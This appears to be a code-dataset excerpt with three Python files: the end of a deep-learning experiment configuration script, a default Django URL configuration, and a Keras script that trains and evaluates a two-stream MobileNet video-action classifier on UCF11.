ch032_1side_5__2side_3__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_3__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_3__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_3__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_4_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_4_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_4_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_4__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_4__3side_4_4side_4, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_4__3side_4_4side_4.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_1_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_1_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_1_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_2_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_2_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_2_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_2_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_2_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_2_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_3_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_3_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_3_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_3_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_3_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_4_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_4_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_4_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_4_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_4_4side_4, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_4_4side_4.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_1 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_1, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_5_4side_1.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_2 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_2, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_5_4side_2.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_3 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_3, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_5_4side_3.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_4 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_4, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_5_4side_4.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
ch032_1side_5__2side_5__3side_5_4side_5 = Exp_builder().set_basic("train", use_db_obj, ch032_pyramid_1side_5__2side_5__3side_5_4side_5, use_loss_obj, exp_dir=exp_dir, code_exe_path=code_exe_path, describe_end=ch032_pyramid_1side_5__2side_5__3side_5_4side_5.kong_model.model_describe) .set_train_args(epochs= 1) .set_train_iter_args(it_see_fq=900, it_save_fq=900 * 2, it_down_step="half", it_down_fq=900).set_train_in_gt_use_range(use_in_range=Range(0, 1), use_gt_range=Range(0, 1)).set_result_name(result_name="")
#############################################################
if __name__ == "__main__":
print("build exps cost time:", time.time() - start_time)
if len(sys.argv) < 2:
############################################################################################################
        ### When run directly — press F5 or type python step10_b1_exp_obj_load_and_train_and_test.py with nothing after it — execution exits here instead of falling through to the code below, which is meant for step10_b_subprocess.py
ch032_1side_1__2side_1__3side_1_4side_1.build().run()
# print('no argument')
sys.exit()
    ### The code below is for step10_b_subprocess.py; it is equivalent to typing python step10_b1_exp_obj_load_and_train_and_test.py some_exp.build().run() on the command line
eval(sys.argv[1])
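    # e.g. (hypothetical invocation): python step10_b1_exp_obj_load_and_train_and_test.py "ch032_1side_2__2side_2__3side_2_4side_2.build().run()"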
| [
"[email protected]"
] | |
0a32d2b6c410aca949535c18a0afdc1811fa82de | d77cee829ec56d2ef12446bf1ebc75cf3a1d8de8 | /src/confluence/urls.py | 11ca30b6e7eba5d7d393b109c004ba297c8ac408 | [
"MIT"
] | permissive | thisisayush/Confluence | 6a508fdd96aebf38a9d063760fed7709c1a968f5 | a7e7b3b4d45ae9577f44d112c7383e4e101f3dd6 | refs/heads/master | 2021-04-15T08:02:05.097647 | 2017-03-02T19:15:49 | 2017-03-02T19:15:49 | 94,565,851 | 0 | 0 | null | 2017-06-16T17:15:55 | 2017-06-16T17:15:55 | null | UTF-8 | Python | false | false | 946 | py | """confluence URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Import the include() function: from django.conf.urls import url, include
3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api-auth/', include('rest_framework.urls',
namespace='rest_framework')),
]
| [
"[email protected]"
] | |
60aab1d320ca746684132493414659925b08ba03 | e916c49c5fa662e54c9d9e07226bc2cd973d2bf1 | /ucf11/mobilenet_twostream2_max.py | a3016608854db500c3c5ee8969cc9ce7ca2bf52f | [] | no_license | Zumbalamambo/cnn-1 | 7111a3ff70344a9c118971f22539fedaffc394fb | 0cc6ef095f5b03152696a75f44109cb67d62cd0e | refs/heads/master | 2020-03-14T04:07:22.213824 | 2018-03-30T09:02:51 | 2018-03-30T09:02:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,298 | py | import keras
import sys
from keras.models import Model
from keras.layers import Dense, Conv2D, Activation, Reshape, Flatten, Input, ZeroPadding2D, Maximum
import get_data as gd
from keras import optimizers
import pickle
import random
import numpy as np
import config
# train: python mobilenet_two_stream.py train 32 1 101 0 0
# test: python mobilenet_two_stream.py test 32 1 101
# retrain: python mobilenet_two_stream.py retrain 32 1 101 1
if sys.argv[1] == 'train':
train = True
retrain = False
old_epochs = 0
spa_epochs = int(sys.argv[5])
tem_epochs = int(sys.argv[6])
elif sys.argv[1] == 'retrain':
train = True
retrain = True
old_epochs = int(sys.argv[5])
else:
train = False
retrain = False
opt_size = 2
batch_size = int(sys.argv[2])
epochs = int(sys.argv[3])
classes = int(sys.argv[4])
depth = 20
input_shape = (224,224,depth)
server = config.server()
if server:
if train:
out_file = '/home/oanhnt/thainh/data/database/train-opt2.pickle'
else:
out_file = '/home/oanhnt/thainh/data/database/test-opt2.pickle'
valid_file = r'/home/oanhnt/thainh/data/database/valid-opt2.pickle'
else:
if train:
out_file = '/mnt/smalldata/database/train-opt2.pickle'
else:
out_file = '/mnt/smalldata/database/test-opt2.pickle'
# two_stream
model = keras.applications.mobilenet.MobileNet(
include_top=True,
dropout=0.5
)
# Disassemble layers
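# The stock MobileNet stem expects a 3-channel RGB input, so it is swapped for a fresh
# 32-filter 3x3 stride-2 conv ('conv_new') that accepts the 20-channel stacked optical-flow
# volume (depth=20 above — presumably 10 flow frames x 2 displacement channels); the
# remaining pretrained layers (indices 3 .. len-4) are then re-attached on top of it.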
layers = [l for l in model.layers]
input_opt = Input(shape=input_shape)
x = ZeroPadding2D(padding=(1, 1), name='conv1_padx')(input_opt)
x = Conv2D(filters=32,
kernel_size=(3, 3),
padding='valid',
use_bias=False,
strides=(2,2),
name='conv_new')(x)
for i in range(3, len(layers)-3):
layers[i].name = str(i)
x = layers[i](x)
x = Flatten()(x)
x = Dense(classes, activation='softmax')(x)
temporal_model = Model(inputs=input_opt, outputs=x)
if train and (not retrain):
temporal_model.load_weights('weights/mobilenet_temporal22_{}e.h5'.format(tem_epochs))
# Spatial
model2 = keras.applications.mobilenet.MobileNet(
include_top=True,
input_shape=(224,224,3),
dropout=0.5
)
y = Flatten()(model2.layers[-4].output)
y = Dense(classes, activation='softmax')(y)
spatial_model = Model(inputs=model2.input, outputs=y)
if train and (not retrain):
spatial_model.load_weights('weights/mobilenet_spatial2_{}e.h5'.format(spa_epochs))
# Fusion
z = Maximum()([y, x])
# Final touch
result_model = Model(inputs=[model2.input,input_opt], outputs=z)
# Run
result_model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=1e-3, momentum=0.9),
metrics=['accuracy'])
if train:
if retrain:
result_model.load_weights('weights/mobilenet_twostream2_max_{}e.h5'.format(old_epochs))
with open(out_file,'rb') as f1:
keys = pickle.load(f1)
len_samples = len(keys)
if server:
with open(valid_file,'rb') as f2:
keys_valid = pickle.load(f2)
len_valid = len(keys_valid)
    print('-'*40)
    print('MobileNet Optical+RGB stream #{}: Training'.format(opt_size))
    print('-'*40)
    print('Number samples: {}'.format(len_samples))
    if server:
        print('Number valid: {}'.format(len_valid))
histories = []
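    # Manual epoch loop: reshuffle the sample keys each epoch, run fit_generator for a
    # single pass, save a weight checkpoint after every epoch, and collect the history
    # rows (acc / val_acc / loss / val_loss) that get pickled below.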
for e in range(epochs):
print('-'*40)
print('Epoch', e+1)
print('-'*40)
random.shuffle(keys)
if server:
history = result_model.fit_generator(
gd.getTrainData(keys,batch_size,classes,5,'train'),
verbose=1,
max_queue_size=2,
steps_per_epoch=len_samples/batch_size,
epochs=1,
validation_data=gd.getTrainData(keys_valid,batch_size,classes,5,'valid'),
validation_steps=len_valid/batch_size
)
histories.append([
history.history['acc'],
history.history['val_acc'],
history.history['loss'],
history.history['val_loss']
])
else:
history = result_model.fit_generator(
gd.getTrainData(keys,batch_size,classes,5,'train'),
verbose=1,
max_queue_size=2,
steps_per_epoch=3,
epochs=1
)
histories.append([
history.history['acc'],
history.history['loss']
])
result_model.save_weights('weights/mobilenet_twostream2_max_{}e.h5'.format(old_epochs+1+e))
    print(histories)
with open('data/trainHistoryTwoStreamMax2{}_{}_{}e'.format(2, old_epochs, epochs), 'wb') as file_pi:
pickle.dump(histories, file_pi)
else:
result_model.load_weights('weights/mobilenet_twostream2_max_{}e.h5'.format(epochs))
with open(out_file,'rb') as f2:
keys = pickle.load(f2)
len_samples = len(keys)
print('-'*40)
print('MobileNet Optical+RGB stream: Testing')
print('-'*40)
    print('Number samples: {}'.format(len_samples))
score = result_model.evaluate_generator(gd.getTrainData(keys,batch_size,classes,5,'test'), max_queue_size=3, steps=len_samples/batch_size)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
| [
"[email protected]"
] |